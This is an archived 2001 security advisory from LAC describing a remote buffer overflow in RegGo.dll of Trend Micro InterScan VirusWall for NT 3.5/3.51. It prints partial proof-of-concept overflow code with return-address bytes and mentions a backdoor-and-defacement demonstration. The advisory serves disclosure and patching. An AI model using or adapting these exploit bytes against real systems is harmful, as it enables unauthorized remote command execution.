[1][USEMAP:frame_r1_c1.gif] [frame_r1_c3.gif] [2]Japanese SNS Advisory [title2_r1_c1.gif] [3][GoIndex.gif] [4][GoBack.gif] 27 [5][GoNext.gif] [6]Japanese Edition SNS Advisory No.27 InterScan VirusWall for NT 3.51 Buffer Overflow Vulnerability Problem first discovered: 20 Apr 2001 Published: 31 May 2001 Last Updated: 31 May 2001 _________________________________________________________________ Overview: A vulnerability was found in the InterScan VirusWall for NT 3.5 from Trend Micro Inc. Problem Description: InterScan VirusWall provides high-performance three-in-one Internet gateway protection against viruses and malicious code via SMTP, HTTP and FTP. A buffer overflow vulnerability exists in RegGo.dll file installed on \Interscan\cgi-bin\.This problem can allow remote users to execute arbitrary commands with system privilege. Example of malicious code: (For English Version) for ( j=0 ; j<816 ; j++ ) sploit[j]='a' ; sploit[j++]=0xEB ; sploit[j++]=0x06 ; sploit[j++]=0x90 ; sploit[j++]=0x90 ; sploit[j++]=0x79 ; sploit[j++]=0x16 ; sploit[j++]=0xF2 ; sploit[j++]=0x77 ; sploit[j++]=0xCC ; --> any code will be executed (For Japanese Version) for ( i=0 ; i<820 ; i++ ) sploit[i] = 'a' ; sploit[i++] = 0x15 ; sploit[i++] = 0xAD ; sploit[i++] = 0xEE ; sploit[i++] = 0x77 ; sploit[i++] = 0xCC ; [27_1.jpg] Fig1: tool (Making a backdoor on port 80) [27_2.jpg] Fig2: Connect to the backdoor(port 80) (defacing default.htm) [27_3.jpg] Fig3: Default.htm on the victim host Tested Version : InterScan VirusWall for NT 3.5 English InterScan VirusWall for NT 3.51 Build 1321 English InterScan VirusWall for NT 3.51 J Tested on: Windows NT 4.0 SP6 Status of fixes: Trend Micro support team will fix this issue in InterScan version 3.51 Build 1349. Until the patch is released, it is recommended to set up access control to refuse access to servers where IIS has been installed. The patch is available at following site: [7]http://www.antivirus.com/download/patches/ Disclaimer: All information in these advisories are subject to change without any advanced notices neither mutual consensus, and each of them is released as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences caused by applying those information. _________________________________________________________________ Copyright(c) 1995-2002 Little eArth Corporation References 1. LYNXIMGMAP:http://www.lac.co.jp/security/english/snsadv_e/27_e.html#r1_c1Map 2. http://www.lac.co.jp/security/index.html 3. http://www.lac.co.jp/security/english/snsadv_e/index.html 4. http://www.lac.co.jp/security/english/snsadv_e/26_e.html 5. http://www.lac.co.jp/security/english/snsadv_e/28_e.html 6. http://www.lac.co.jp/security/intelligence/SNSAdvisory/27.html 7. http://www.antivirus.com/download/patches/